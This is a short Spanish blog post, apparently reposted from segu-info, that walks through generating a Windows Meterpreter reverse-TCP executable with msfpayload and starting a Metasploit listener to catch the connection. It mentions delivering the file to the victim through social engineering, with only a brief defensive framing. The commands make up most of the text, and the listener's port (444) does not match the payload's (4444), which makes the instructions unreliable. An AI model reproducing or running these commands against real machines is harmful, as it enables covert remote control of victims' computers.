msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=4444 X >/root/Escritorio/C0lds0ft.exe
Con este archivo generamos la conexión en reversa desde la víctima, y aquí el ingenio y las técnicas de ingeniería social que se utilice para hacerlo llegar al Target son las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas. Posterior a enviado se procede a poner a la escucha así:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.254 set LPORT 444 exploit
Fuente segu-info
No hay comentarios:
Publicar un comentario